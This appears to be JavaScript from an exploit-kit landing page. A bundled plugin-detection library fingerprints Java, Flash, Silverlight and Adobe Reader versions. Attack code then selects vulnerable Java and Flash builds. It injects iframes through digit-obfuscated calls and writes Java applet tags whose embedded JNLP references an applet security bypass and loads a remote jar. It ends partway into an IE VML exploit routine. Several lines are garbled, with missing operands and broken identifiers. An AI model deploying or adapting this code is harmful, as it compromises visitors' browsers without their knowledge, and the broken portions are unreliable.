- DTK: {
- hasRun: 0,
- status: null,
- version: "",
- HTML: null,
- Plugin2Status: null,
- classID: ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],
- mimeType: ["application/java-deployment-toolkit", "application/npruntime-scriptable-plugin;DeploymentToolkit"],
- isDisabled: function(b) {
- return this.HTML ? 1 : b || a.dbug ? 0 : this.hasRun || !a.DOM.isEnabled.objectTagUsingActiveX() ? 1 : 0
- },
- query: function(b) {
- var c = k,
- d, e, f = a.DOM.altHTML,
- g, h = null,
- l = null;
- b = this.isDisabled(b);
- this.hasRun = 1;
- if (b) return this;
- this.status = 0;
- if (a.DOM.isEnabled.objectTagUsingActiveX())
- for (d = 0; d < this.classID.length; d++) {
- this.HTML = a.DOM.insert("object", ["classid", this.classID[d]], [], f);
- h = this.HTML.obj();
- if (a.pd.getPROP(h, "jvms")) break;
- } else(e = a.hasMimeType(this.mimeType)) && e.type && (this.HTML = a.DOM.insert("object", ["type", e.type], [], f), h = this.HTML.obj());
- if (h) {
- try {
- if (g = a.pd.getPROP(h, "jvms"))
- if (l = g.getLength(), a.isNum(l))
- for (this.status = 0 < l ? 1 : -1, d = 0; d < l; d++)
- if (e = a.getNum(g.get(l - 1 - d).version)) this.VERSIONS.push(e), a.formatNum(e)
- } catch (p) {}
- this.VERSIONS.length && (this.version = a.formatNum(this.VERSIONS[0]))
- }
- return this
- }
- },
- navMime: {
- hasRun: 0,
- mimetype: "",
- version: "",
- mimeObj: 0,
- pluginObj: 0,
- regexJPI: /^\s*application\/x-java-applet;jpi-version\s*=\s*(\d.*)$/i,
- isDisabled: function() {
- var a = k;
- return this.hasRun || !a.navigator.mimeObj ? 1 : 0
- },
- update: function(b) {
- var c = b ? b.enabledPlugin : 0,
- d = b && this.regexJPI.test(b.type || "") ? a.formatNum(a.getNum(RegExp.$1)) : 0;
- d && c && (c.description || && (0 < a.compareNums(d, this.version || a.formatNum("0")) && (this.version = d, this.mimeObj = b, this.pluginObj = c, this.mimetype = b.type))
- },
- query: function() {
- var b = k,
- c, d, e, f, g, h = navigator.mimeTypes;
- c = this.isDisabled();
- this.hasRun = 1;
- if (c) return this;
- g = h.length;
- if (a.isNum(g))
- for (c = 0; c < g; c++) {
- d = 0;
- try {
- d = h[c]
- } catch (l) {}
- this.update(d)
- }
- if (!this.version || a.dbug)
- for (f = a.isArray(b.mimeType) ? b.mimeType : [b.mimeType], c = 0; c < f.length; c++) {
- d = 0;
- try {
- d = h[f[c]]
- } catch (n) {}
- g = (e = d ? d.enabledPlugin : 0) ? e.length : null;
- if (a.isNum(g))
- for (b = 0; b < g; b++) {
- d = 0;
- try {
- d = e[b]
- } catch (p) {}
- this.update(d)
- }
- }
- return this
- }
- },
- navPlugin: {
- hasRun: 0,
- version: "",
- getPlatformNum: function() {
- var b = 0,
- c = /Java.*TM.*Platform[^\d]*(\d+)[\.,_]?(\d*)\s*U?(?:pdate)?\s*(\d*)/i,
- d = a.pd.findNavPlugin({
- find: c,
- mimes: k.mimeType,
- plugins: 1
- });
- d && (c.test( || "") || c.test(d.description || "")) && 5 <= parseInt(RegExp.$1, 10) && (b = "1," + RegExp.$1 + "," + (RegExp.$2 ? RegExp.$2 : "0") + "," + (RegExp.$3 ? RegExp.$3 : "0"));
- return b
- },
- getPluginNum: function() {
- var b = k,
- c = 0,
- d, e;
- d = /Java[^\d]*Plug-in/i;
- if (e = a.pd.findNavPlugin({
- find: d,
- num: 1,
- mimes: b.mimeType,
- plugins: 1,
- dbug: 0
- })) c = this.checkPluginNum(e.description, d), d = this.checkPluginNum(, d), c = c && d ? 0 < a.compareNums(c, d) ? c : d : c || d;
- !c && (d = /Java.*\d.*Plug-in/i, e = a.pd.findNavPlugin({
- find: d,
- mimes: b.mimeType,
- plugins: 1,
- dbug: 0
- })) && (c = this.checkPluginNum(e.description, d), d = this.checkPluginNum(, d), c = c && d ? 0 < a.compareNums(c, d) ? c : d : c || d);
- return c
- },
- checkPluginNum: function(b, c) {
- var d;
- (d = c.test(b) ? a.formatNum(a.getNum(b)) : 0) && 0 <= a.compareNums(d, a.formatNum("10")) && (d = d.split(a.splitNumRegx), d = a.formatNum("1," + (parseInt(d[0], 10) - 3) + ",0," + d[1]));
- d && (0 > a.compareNums(d, a.formatNum("1,3")) || 0 <= a.compareNums(d, a.formatNum("2"))) && (d = 0);
- return d
- },
- query: function() {
- var b = k,
- c = 0,
- b = this.hasRun || !b.navigator.mimeObj;
- this.hasRun = 1;
- if (b) return this;
- (!c || a.dbug) && (b = this.getPlatformNum()) && (c = b);
- (!c || a.dbug) && (b = this.getPluginNum()) && (c = b);
- c && (this.version = a.formatNum(c));
- return this
- }
- },
- applet: {
- codebase: {
- isMin: function(b) {
- this.$$ = k;
- return a.codebase.isMin(this, b)
- },
- search: function() {
- this.$$ = k;
- return
- },
- [15, 128],
- [6, 0, 512], 0, [1, 5, 2, 256], 0, [1, 4, 1, 1],
- [1, 4, 0, 64],
- [1, 3, 2, 32]
- ],
- DIGITMIN: [1, 0, 0, 0],
- Upper: "999 10 5,0,20 1,5,0,20 1,4,1,20 1,4,1,2 1,4,1 1,4".split(" "),
- Lower: "10 5,0,20 1,5,0,20 1,4,1,20 1,4,1,2 1,4,1 1,4 0".split(" "),
- convert: [function(a, c) {
- return c ? [1 < parseInt(a[0], 10) ? "99" : parseInt(a[1], 10) + 3 + "", a[3], "0", "0"] : ["1", parseInt(a[0], 10) - 3 + "", "0", a[1]]
- }, function(a, c) {
- return c ? [a[1], a[2], a[3] + "0", "0"] : ["1", a[0], a[1], a[2].substring(0, a[2].length - 1 || 1)]
- }, 0, function(a, c) {
- return c ? [a[0], a[1], a[2], a[3] + "0"] : [a[0], a[1], a[2], a[3].substring(0, a[3].length - 1 || 1)]
- }, 0, 1, function(a, c) {
- return c ? [a[0], a[1], a[2], a[3] + "0"] : [a[0], a[1], a[2], a[3].substring(0, a[3].length - 1 || 1)]
- }, 1]
- },
- results: [
- [null, null],
- [null, null],
- [null, null],
- [null, null]
- ],
- getResult: function() {
- var a = this.results,
- c, d = [];
- for (c = a.length - 1; 0 <= c && (d = a[c], !d[0]); c--);
- return d = [].concat(d)
- },
- DummySpanTagHTML: 0,
- HTML: [0, 0, 0, 0],
- active: [0, 0, 0, 0],
- DummyObjTagHTML: 0,
- DummyObjTagHTML2: 0,
- allowed: [1, 1, 1, 1],
- VerifyTagsHas: function(a) {
- var c;
- for (c = 0; c < this.allowed.length; c++)
- if (this.allowed[c] === a) return 1;
- return 0
- },
- saveAsVerifyTagsArray: function(b) {
- var c;
- if (a.isArray(b)) {
- for (c = 1; c < this.allowed.length; c++) b.length > c - 1 && a.isNum(b[c - 1]) && (0 > b[c - 1] && (b[c - 1] = 0), 3 < b[c - 1] && (b[c - 1] = 3), this.allowed[c] = b[c - 1]);
- this.allowed[0] = this.allowed[3];
- }
- },
- setVerifyTagsArray: function(b) {
- var c = k;
- null === c.getVersionDone && this.saveAsVerifyTagsArray(c.getVerifyTagsDefault());
- a.dbug ? this.saveAsVerifyTagsArray([3, 3, 3]) : b && this.saveAsVerifyTagsArray(b)
- },
- isDisabled: {
- single: function(b) {
- if (this.all()) return 1;
- if (0 == b) return a.codebase.isDisabled();
- if (1 == b) return !a.DOM.isEnabled.objectTag();
- if (2 == b) return this.AppletTag();
- if (3 == b) return !a.DOM.isEnabled.objectTagUsingActiveX()
- },
- all_: null,
- all: function() {
- var b = k.navigator,
- c = a.browser;
- null === this.all_ && (b = c.isOpera && 0 > a.compareNums(c.verOpera, "13,0,0,0") && !b.javaEnabled() || this.AppletTag() && !a.DOM.isEnabled.objectTag() || !b.mimeObj && !c.isIE ? 1 : 0, this.all_ = b);
- return this.all_
- },
- AppletTag: function() {
- var b = k.navigator;
- return a.browser.isIE ? !b.javaEnabled() : 0
- },
- VerifyTagsDefault_1: function() {
- var b = a.browser;
- return b.isIE && (9 > b.verIE || !b.ActiveXEnabled) || b.verGecko && 0 > a.compareNums(b.verGecko, a.formatNum("2")) || b.isSafari && (!b.verSafari || 0 > a.compareNums(b.verSafari, a.formatNum("4"))) || b.isOpera && 0 > a.compareNums(b.verOpera, a.formatNum("11")) ? 0 : 1
- }
- },
- can_Insert_Query: function(a) {
- var c = this.results[0][0],
- d = this.getResult()[0];
- return this.HTML[a] || 0 == a && null !== c && !this.isRange(c) || 0 == a && d && !this.isRange(d) ? 0 : !this.isDisabled.single(a)
- },
- can_Insert_Query_Any: function() {
- var a;
- for (a = 0; a < this.results.length; a++)
- if (this.can_Insert_Query(a)) return 1;
- return 0
- },
- should_Insert_Query: function(a) {
- var c = this.allowed,
- d = k,
- e = this.getResult()[0],
- e = e && (0 < a || !this.isRange(e));
- return this.can_Insert_Query(a) && 0 !== c[a] ? 3 == c[a] || 2.8 == c[a] && !e || !d.nonAppletDetectionOk(d.version0) && (2 == c[a] || 1 == c[a] && !e) ? 1 : 0 : 0
- },
- should_Insert_Query_Any: function() {
- var a;
- for (a = 0; a < this.allowed.length; a++)
- if (this.should_Insert_Query(a)) return 1;
- return 0
- },
- query: function(b) {
- var c = k,
- d = null,
- e = null,
- f = this.results,
- g, h = this.HTML[b];
- if (h && h.obj() && !(f[b][0] || c.bridgeDisabled || a.dbug && 3 > c.OTF)) {
- c = h.obj();
- g = h.readyState();
- try {
- d = a.getNum(c.getVersion() + ""), e = c.getVendor() + "", c.statusbar(" ")
- } catch (l) {}
- d && a.isStrNum(d) && (f[b] = [d, e],[b] = 2);
- }
- },
- isRange: function(a) {
- return /^[<>]/.test(a || "") ? ">" == a.charAt(0) ? 1 : -1 : 0
- },
- setRange: function(b, c) {
- return (b ? 0 < b ? ">" : "<" : "") + (a.isString(c) ? c : "")
- },
- insertJavaTag: function(b, c, d, e, f) {
- var g = k,
- h = a.file.getValid(g),
- l = h.path,
- h = ["archive", + h.ext, "code", "A.class"];
- e = (e ? ["width", e] : []).concat(f ? ["height", f] : []);
- f = ["mayscript", "true"];
- var n = ["scriptable", "true", "codebase_lookup", "false"].concat(f),
- p = g.navigator,
- p = !a.browser.isIE && p.mimeObj && p.mimeObj.type ? p.mimeObj.type : g.mimeType[0];
- if (1 == b) return a.DOM.insert("object", ["type", p].concat(e), ["codebase", l].concat(h).concat(n), d, g, 0, c);
- if (2 == b) return a.browser.isIE ? a.DOM.insert("applet", ["alt", d].concat(f).concat(h).concat(e), ["codebase", l].concat(n), d, g, 0, c) : a.DOM.insert("applet", ["codebase", l, "alt", d].concat(f).concat(h).concat(e), [].concat(n), d, g, 0, c);
- if (3 == b) return a.browser.isIE ? a.DOM.insert("object", ["classid", g.classID].concat(e), ["codebase", l].concat(h).concat(n), d, g, 0, c) : a.DOM.insert();
- if (4 == b) return a.DOM.insert("embed", ["codebase", l].concat(h).concat(["type", p]).concat(n).concat(e), [], d, g, 0, c)
- },
- insert_Query_Any: function(b) {
- var c = k,
- d = this.results,
- e = this.HTML,
- f = a.DOM.altHTML,
- g, h = a.file.getValid(c);
- this.should_Insert_Query(0) && (2 > c.OTF && (c.OTF = 2), d[0] = [0, 0], (g = b ? this.codebase.isMin(b) : && (d[0][0] = b ? this.setRange(g, b) : g),[0] = g ? 1.5 : -1);
- if (!h) return this.getResult();
- this.DummySpanTagHTML || (this.DummySpanTagHTML = a.DOM.insert("", [], [], f));
- this.should_Insert_Query(1) && (2 > c.OTF && (c.OTF = 2), e[1] = this.insertJavaTag(1, 0, f), d[1] = [0, 0], this.query(1));
- this.should_Insert_Query(2) && (2 > c.OTF && (c.OTF = 2), e[2] = this.insertJavaTag(2, 0, f), d[2] = [0, 0], this.query(2));
- this.should_Insert_Query(3) && (2 > c.OTF && (c.OTF = 2), e[3] = this.insertJavaTag(3, 0, f), d[3] = [0, 0], this.query(3));
- a.DOM.isEnabled.objectTag() && (this.DummyObjTagHTML || !e[1] && !e[2] || (this.DummyObjTagHTML = a.DOM.insert("object", ["type", c.mimeType_dummy], [], f)), !this.DummyObjTagHTML2 && e[3] && (this.DummyObjTagHTML2 = a.DOM.insert("object", ["classid", c.classID_dummy], [], f)));
- c.NOTF.init();
- return this.getResult()
- }
- },
- NOTF: {
- count: 0,
- countMax: 25,
- intervalLength: 250,
- init: function() {
- var b = k;
- 3 > b.OTF && this.shouldContinueQuery() && (b.OTF = 3, this.onIntervalQuery = a.ev.handler(this.$$onIntervalQuery, this), ||[this.onWinLoadQuery, this]), setTimeout(this.onIntervalQuery, this.intervalLength))
- },
- shouldContinueQuery: function() {
- var b = k.applet,
- c, d = 0;
- if ( && this.count > this.countMax) return 0;
- for (c = 0; c < b.results.length; c++)
- if (b.HTML[c] && (! && this.count > this.countMax && a.codebase.pluginMayBeHanging(b.HTML[c].span) && (d = 1, b.HTML[c].DELETE = 1), !d && !b.results[c][0] && (2 <= b.allowed[c] || 1 == b.allowed[c] && !b.getResult()[0]) && 0 <= this.isAppletActive(c))) return 1;
- return 0
- },
- isJavaActive: function(a) {
- var c = k,
- d, e, f = -9;
- for (d = 0; d < c.applet.HTML.length; d++) e = this.isAppletActive(d, a), e > f && (f = e);
- return f
- },
- isAppletActive: function(b, c) {
- var d = k,
- e = d.navigator,
- f = d.applet,
- g = f.HTML[b],
- h =,
- l = 0,
- n;
- n = h[b];
- if (c || 1.5 <= n || !g || !g.span) return n;
- n = a.DOM.getTagStatus(g, f.DummySpanTagHTML, f.DummyObjTagHTML, f.DummyObjTagHTML2, this.count);
- for (f = 0; f < h.length; f++) 0 < h[f] && (l = 1);
- n = 1 != n ? n : a.browser.isIE || d.version0 && e.javaEnabled() && e.mimeObj && ("object" == g.tagName || l) ? 1 : 0;
- return h[b] = n
- },
- onWinLoadQuery: function(a, c) {
- var d;
- 3 == k.OTF && (d = c.queryAllApplets(), c.queryCompleted(d))
- },
- $$onIntervalQuery: function(a) {
- var c = k,
- d;
- 3 == c.OTF && (d = a.queryAllApplets(), a.shouldContinueQuery() || a.queryCompleted(d));
- a.count++;
- 3 == c.OTF && setTimeout(a.onIntervalQuery, a.intervalLength)
- },
- queryAllApplets: function() {
- var b = k.applet,
- c;
- for (c = 0; c < b.results.length; c++) b.query(c);
- b = b.getResult();
- return b
- },
- queryCompleted: function(b) {
- var c = k,
- d = c.applet,
- e;
- if (!(4 <= c.OTF)) {
- c.OTF = 4;
- this.isJavaActive();
- for (e = 0; e < d.HTML.length; e++) d.HTML[e] && d.HTML[e].DELETE && (a.DOM.emptyNode(d.HTML[e].span), d.HTML[e].span = null);
- c.setPluginStatus(b[0], b[1], 0);
- a.onDetectionDone && c.DoneHndlrs && (a.ev.callArray(c.DoneHndlrs))
- }
- }
- },
- zz: 0
- };
- a.addPlugin("java", k);
- var t = {
- mimeType: "application/x-shockwave-flash",
- setPluginStatus: function(b, c) {
- this.installed = c ? 1 : b ? 0 : -1;
- this.version = a.formatNum(c);
- this.getVersionDone = -1 == this.installed || this.axo.version || this.instance.version ? 1 : 0
- },
- getVersion: function(b, c) {
- var d = null,
- e = 0;
- e && !a.dbug || !this.navPlugin.query().installed || (e = 1);
- d && !a.dbug || !this.navPlugin.query().version || (d = this.navPlugin.version);
- e && !a.dbug || !this.axo.query().installed || (e = 1);
- d && !a.dbug || !this.axo.query().version || (d = this.axo.version);
- (!e && !d || c || a.dbug) && this.instance.query().version && (e = 1, d = this.instance.version);
- this.setPluginStatus(e, d)
- },
- navPlugin: {
- hasRun: 0,
- installed: 0,
- version: null,
- getNum: function(a) {
- return a ? (a = /[\d][\d\,\.\s]*[rRdD]{0,1}[\d\,]*/.exec(a)) ? a[0].replace(/[rRdD\.]/g, ",").replace(/\s/g, "") : null : null
- },
- query: function() {
- var b = t,
- c, d = this.hasRun || !a.hasMimeType(b.mimeType);
- this.hasRun = 1;
- if (d) return this;
- if (b = a.pd.findNavPlugin({
- find: "Shockwave.*Flash",
- mimes: b.mimeType,
- plugins: ["Shockwave Flash"]
- })) this.installed = 1, b.description && (c = this.getNum(b.description));
- c && (c = a.getPluginFileVersion(b, c));
- c && (this.version = c);
- return this
- }
- },
- axo: {
- hasRun: 0,
- installed: 0,
- version: null,
- progID: "ShockwaveFlash.ShockwaveFlash",
- classID: "clsid:D27CDB6E-AE6D-11CF-96B8-444553540000",
- query: function() {
- var b, c, d;
- b = this.hasRun;
- this.hasRun = 1;
- if (b) return this;
- for (c = 0; 10 > c; c++)
- if (d = a.getAXO(this.progID + (c ? "." + c : ""))) {
- this.installed = 1;
- b = 0;
- try {
- b = a.getNum(d.GetVariable("$version") + "")
- } catch (e) {}
- if (b && (this.version = b, !a.dbug)) break
- }
- return this
- }
- },
- instance: {
- hasRun: 0,
- version: null,
- HTML: null,
- isEnabled: function() {
- var b = t,
- c = 1;
- if (this.hasRun || a.DOM.isEnabled.objectTagUsingActiveX() || !a.hasMimeType(b.mimeType)) c = 0;
- return c
- },
- query: function() {
- var b = t,
- c = this.isEnabled();
- this.hasRun = 1;
- if (c) {
- this.HTML = a.DOM.insert("object", ["type", b.mimeType], ["play", "false", "menu", "false"], "", b);
- try {
- this.version = a.getNum(this.HTML.obj().GetVariable("$version") + "")
- } catch (d) {}
- }
- return this
- }
- }
- };
- a.addPlugin("flash", t);
- a.addPlugin("silverlight", {
- getVersion: function() {
- var b = null,
- c = 0;
- c && !a.dbug || !this.nav.query().installed || (c = 1);
- b && !a.dbug || !this.nav.query().version || (b = this.nav.version);
- c && !a.dbug || !this.axo.query().installed || (c = 1);
- b && !a.dbug || !this.axo.query().version || (b = this.axo.version);
- this.version = a.formatNum(b);
- this.installed = b ? 1 : c ? 0 : -1
- },
- nav: {
- hasRun: 0,
- installed: 0,
- version: null,
- mimeType: ["application/x-silverlight", "application/x-silverlight-2"],
- query: function() {
- var b, c;
- c = this.hasRun || !a.hasMimeType(this.mimeType);
- this.hasRun = 1;
- if (c) return this;
- if (c = a.pd.findNavPlugin({
- find: "Silverlight.*Plug-?in",
- mimes: this.mimeType,
- plugins: "Silverlight Plug-In"
- })) this.installed = 1;
- c && c.description && (b = a.formatNum(a.getNum(c.description + "")));
- b && (b = b.split(a.splitNumRegx), 2 > parseInt(b[0], 10) && 30226 <= parseInt(b[2], 10) && (b[0] = "2"), b = b.join(","));
- b && (this.version = b);
- return this
- }
- },
- axo: {
- hasRun: 0,
- installed: 0,
- version: null,
- progID: "AgControl.AgControl",
- maxdigit: [20, 10, 10, 100, 100, 10],
- mindigit: [0, 0, 0, 0, 0, 0],
- IsVersionSupported: function(b, c) {
- try {
- return this.testVersion ? 0 <= a.compareNums(a.formatNum(this.testVersion.join(",")), a.formatNum(c.join(","))) : b.IsVersionSupported(this.format(c))
- } catch (d) {}
- return 0
- },
- format: function(a) {
- return a[0] + "." + a[1] + "." + a[2] + this.make2digits(a[3]) + this.make2digits(a[4]) + "." + a[5]
- },
- make2digits: function(a) {
- return (10 > a ? "0" : "") + a + ""
- },
- query: function() {
- var b, c;
- b = this.hasRun;
- this.hasRun = 1;
- if (b) return this;
- if (c = a.getAXO(this.progID)) this.installed = 1;
- if (c && this.IsVersionSupported(c, this.mindigit)) {
- var d = [].concat(this.mindigit),
- e, f = 0;
- for (b = 0; b < this.maxdigit.length; b++) {
- for (e = 0; 1 < this.maxdigit[b] - this.mindigit[b] && 20 > e;) e++, f++, d[b] = Math.round((this.maxdigit[b] + this.mindigit[b]) / 2), this.IsVersionSupported(c, d) ? this.mindigit[b] = d[b] : this.maxdigit[b] = d[b];
- d[b] = this.mindigit[b]
- }
- this.version = this.format(d);
- }
- return this
- }
- }
- });
- var y = {
- setPluginStatus: function() {
- var b = this.nav.detected,
- c = this.axo.detected,
- d = this.axo.version,
- e = this.doc.detected,
- f = this.doc.version,
- d = this.nav.version || d || f || null;
- this.installed = d ? 1 : 0 < b || 0 < c || 0 < e ? 0 : -0.5 == e ? -0.15 : !a.browser.isIE || a.browser.ActiveXEnabled && !a.browser.ActiveXFilteringEnabled ? -1 : -1.5;
- this.version = a.formatNum(d);
- },
- getVersion: function(b, c) {
- var d = 0;
- (!d || a.dbug) && 0 < this.nav.query().detected && (d = 1);
- (!d || a.dbug) && 0 < this.axo.query().detected && (d = 1);
- d && !a.dbug || this.doc.query();
- this.setPluginStatus()
- },
- nav: {
- detected: 0,
- version: null,
- mimeType: ["application/pdf", "application/vnd.adobe.pdfxml"],
- find: "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in",
- plugins: ["Adobe Acrobat", "Adobe Acrobat and Reader Plug-in", "Adobe Reader Plugin"],
- query: function() {
- var b, c = null;
- if (this.detected || !a.hasMimeType(this.mimeType)) return this;
- this.detected = (b = a.pd.findNavPlugin({
- find: this.find,
- mimes: this.mimeType,
- plugins: this.plugins
- })) ? 1 : -1;
- b && (c = a.getNum(b.description) || a.getNum(, c = a.getPluginFileVersion(b, c), c || (c = this.attempt3()), c && (this.version = c));
- return this
- },
- attempt3: function() {
- var b = null;
- 1 == a.OS && (a.hasMimeType("application/vnd.adobe.pdfxml") ? b = "9" : a.hasMimeType("application/vnd.adobe.x-mars") ? b = "8" : a.hasMimeType("application/vnd.adobe.xfdf") && (b = "6"));
- return b
- }
- },
- pluginQuery: function(b) {
- var c = "",
- d = null,
- e, f;
- try {
- b && (c = b.GetVersions())
- } catch (g) {}
- if (c && a.isString(c))
- for (b = /=\s*([\d\.]+)/g, e = 0; 30 > e; e++)
- if (b.test(c)) {
- if (f = a.formatNum(RegExp.$1), !d || 0 < a.compareNums(f > d)) d = f
- } else break;
- return d
- },
- axo: {
- detected: 0,
- version: null,
- progID: ["AcroPDF.PDF", "AcroPDF.PDF.1", "PDF.PdfCtrl", "PDF.PdfCtrl.5", "PDF.PdfCtrl.1"],
- query: function() {
- var b = y,
- c, d = null,
- e;
- if (this.detected) return this;
- this.detected = -1;
- for (e = 0; e < this.progID.length; e++)
- if (c = a.getAXO(this.progID[e]))
- if (this.detected = 1, d = b.pluginQuery(c), !a.dbug && d) break;
- d && (this.version = d);
- return this
- }
- },
- doc: {
- detected: 0,
- version: null,
- classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
- classID_dummy: "clsid:CA8A9780-280D-11CF-A24D-BA9876543210",
- DummySpanTagHTML: 0,
- HTML: 0,
- DummyObjTagHTML1: 0,
- DummyObjTagHTML2: 0,
- isDisabled: function() {
- var b = 0;
- this.HTML ? b = 1 : a.dbug || a.DOM.isEnabled.objectTagUsingActiveX() || (b = 1);
- return b
- },
- query: function() {
- var b = y,
- c = null,
- c = a.DOM.altHTML,
- d;
- if (this.isDisabled()) return this;
- this.DummySpanTagHTML || (this.DummySpanTagHTML = a.DOM.insert("", [], [], c, b, 1));
- this.HTML || (this.HTML = a.DOM.insert("object", ["classid", this.classID], [], c, b, 1));
- this.DummyObjTagHTML2 || (this.DummyObjTagHTML2 = a.DOM.insert("object", ["classid", this.classID_dummy], [], c, b, 1));
- d = a.DOM.getTagStatus(this.HTML, this.DummySpanTagHTML, this.DummyObjTagHTML1, this.DummyObjTagHTML2, null, 1);
- c = b.pluginQuery(this.HTML.obj());
- this.detected = 0 < d || c ? 1 : -0.1 == d || -0.5 == d ? -0.5 : -1;
- this.version = c ? c : null;
- return this
- }
- }
- };
- a.addPlugin("adobereader", y);
- })();
- j_version = PluginDetect.getVersion('Java');
- p_version = PluginDetect.getVersion('AdobeReader');
- f_version = PluginDetect.getVersion('Flash');
- s_version = PluginDetect.getVersion('Silverlight');
- if (j_version != null) {
- j_version = j_version.split(",");
- } else {
- j_version = [0, 0, 0, 0];
- }
- if (p_version != null) {
- p_version = p_version.split(",");
- } else {
- p_version = [0, 0, 0, 0];
- }
- if (f_version != null) {
- f_version = f_version.split(",");
- } else {
- f_version = [0, 0, 0, 0];
- }
- if (s_version != null) {
- s_version = s_version.split(",");
- } else {
- s_version = [0, 0, 0, 0];
- }
- function fg(url, width, height) {
- var s1 = document.createElement("if32ra30me".replace(/[0-9]/g, ""));
- s1["s68etA65ttribute".replace(/[0-9]/g, "")]("sr94c".replace(/[0-9]/g, ""), url);
- s1["se2tAt31tribute".replace(/[0-9]/g, "")]("w42idt106h".replace(/[0-9]/g, ""), width);
- s1["s50etAttr13ibute".replace(/[0-9]/g, "")]("he87igh82t".replace(/[0-9]/g, ""), height);
- document.body.appendChild(s1);
- }
- function ffbgrnth5we(a) {
- document.write(a);
- }
- function asfwe(aa) {
- if (aa == 1) return ffbgrnth5we('<applet code="Mikado.class" archive="/f285e22b91c0c2uuv/1415616660"><param name="ldcrlio" value="wVVTnhh3L1q/23LPw1IJ61rq6:P6:_-hlMBF1MMZPM--_hRKRFHRHHHXhM"><param name="t" value="0"><param name="tt" value="0"></applet>');
- if (aa == 2) return ffbgrnth5we('<applet><param name="jnlp_href" value="Mikado.jnlp" /><param name="jnlp_embedded" value="PGpubHAgc3BlYz0iMS4wIiB4bWxuczpqZng9Imh0dHA6Ly9nb29nbGUuY29tIiBocmVmPSJhcHBsZXRfc2VjdXJpdHlfYnlwYXNzLmpubHAiPg0KICA8aW5mb3JtYXRpb24+DQogICAgPHRpdGxlPlkgYXNmIElJPC90aXRsZT4NCiAgICA8dmVuZG9yPmZkZmVncndlPC92ZW5kb3I+DQogIDwvaW5mb3JtYXRpb24+DQogIA0KICAgPHJlc291cmNlcz4NCiAgICAgICAgPGoyc2UgdmVyc2lvbj0iMS43KyIgaHJlZj0iIi8+DQogICAgICAgIDxqYXIgaHJlZj0iL2YyODVlMjJiOTFjMGMydXV2LzE0MTU2MTY2NjAiIG1haW49InRydWUiIC8+DQogIDwvcmVzb3VyY2VzPg0KICA8YXBwbGV0LWRlc2MgbmFtZT0iQUZ1Y2sgT2ZmIiBoZWlnaHQ9IjEiICAgd2lkdGg9IjEiIG1haW4tY2xhc3M9Ik1pa2FkbyI+DQogICAgIDxwYXJhbSB2YWx1ZT0idHJ1ZSIgbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgLz4NCg0KICA8L2FwcGxldC1kZXNjPg0KPC9qbmxwPg==" /><param name="ldcrlio" value="wVVTnhh3L1q/23LPw1IJ61rq6:P6:_-hlMBF1MMZPM--_hRKRFHRHHHXhM"><param name="t" value="0"><param name="tt" value="0"></applet>');
- if (aa == 3) return ffbgrnth5we('<applet> <param name="jnlp_href" value="dfweqdasdfeqw.jnlp" /> <param name="jnlp_embedded" value="ICA8am5scCBzcGVjPSIxLjAiIHhtbG5zOmpmeD0iaHR0cDovL2dvb2dsZS5jb20iIGhyZWY9IiI+DQogICAgICAgICAgICA8aW5mb3JtYXRpb24+DQogICAgICAgICAgICA8dGl0bGU+ZGZ3ZWRhZmQ8L3RpdGxlPg0KICAgICAgICAgICAgPHZlbmRvcj5lZnZyd2VmcTwvdmVuZG9yPg0KICAgICAgICAgICAgPC9pbmZvcm1hdGlvbj4NCiAgICAgICAgICAgIDxyZXNvdXJjZXM+DQogICAgICAgICAgICA8ajJzZSB2ZXJzaW9uPSIxLjcrIiBocmVmPSIiIC8+DQogICAgICAgICAgICA8amFyIGhyZWY9Ii9mMjg1ZTIyYjkxYzBjMnV1di8xNDE1NjE2NjYwIiBtYWluPSJ0cnVlIiAvPg0KICAgICAgICAgICAgPC9yZXNvdXJjZXM+DQogICAgICAgICAgICA8amZ4OmphdmFmeC1kZXNjIG1haW4tY2xhc3M9IlJhZHZhIiBwcmVsb2FkZXItY2xhc3M9Ik1pa2FkbyIgbmFtZT0iQXBwIi8+DQogICAgICAgICAgICA8YXBwbGV0LWRlc2MgbmFtZT0iQXNkZiIgbWFpbi1jbGFzcz0iVmFzZGEiIHdpZHRoPSIzIiBoZWlnaHQ9IjMiPg0KICAgICAgICAgICAgPC9hcHBsZXQtZGVzYz48L2pubHA+" /> <param name="javafx_version" value="2.0+" /> <param name="ldcrlio" value="wVVTnhh3L1q/23LPw1IJ61rq6:P6:_-hlMBF1MMZPM--_hRKRFHRHHHXhM" /> <param name="t" value="0" /> <param name="tt" value="0" /> </applet>');
- }
- java_enable = 0;
- java_run = 0;
- if (j_version[0] > 0 && j_version[1] < 7) {
- java_enable = 1;
- java_run = 1;
- }
- if (j_version[0] > 0 && j_version[1] == 7 && j_version[3] <= 17) {
- java_enable = 1;
- java_run = 2;
- }
- if (j_version[0] > 0 && j_version[1] == 7 && j_version[3] == 21) {
- java_enable = 1;
- java_run = 3;
- }
- function CheckVersion11(f_version) {
- if (f_version[0] != 11) return false;
- if (f_version[1] == 9 && f_version[2] > 900) return false;
- if (f_version[1] > 2 && f_version[2] > 202 && f_version[3] > 406) return false;
- return true;
- }
- function CheckVersion12(f_version) {
- if (f_version[0] != 12) return false;
- return true;
- }
- function CheckVersion13(f_version) {
- if (f_version[0] != 13) return false;
- if (f_version[0] == 13 && f_version[1] == 0 && f_version[2] == 0 && f_version[3] > 241) return false;
- return true;
- }
- function CheckVersion14(f_version) {
- if (f_version[0] != 14) return false;
- if (f_version[0] == 14 && f_version[1] == 0 && f_version[2] == 0 && f_version[3] > 179) return false;
- return true;
- }
- function CheckVersion15(f_version) {
- if (f_version[0] != 15) return false;
- if (f_version[0] == 15 && f_version[1] == 0 && f_version[2] == 0 && f_version[3] > 152) return false;
- return true;
- }
- function msie_run() {
- try {
- wondow.docume() = 'urn:schemas-microsoft-com:vml';
- } catch (e) {
- try {
- document['namespaces'].add('T76XLI47Qu', 'urn:schemas-microsoft-com:vml', '#default#VML');
- } catch (e) {}
- }
- document['createStyleSheet']()['cssText'] = 'T76XLI47Qu:*{behavior:url(#default#VML);display:inline-block;}';
- var v1 = "<T76XLI47Qu:oval><T76XLI47Qu:stroke id='FSIK1pVI'></T76XLI47Qu:stroke></T76XLI47Qu:oval>";
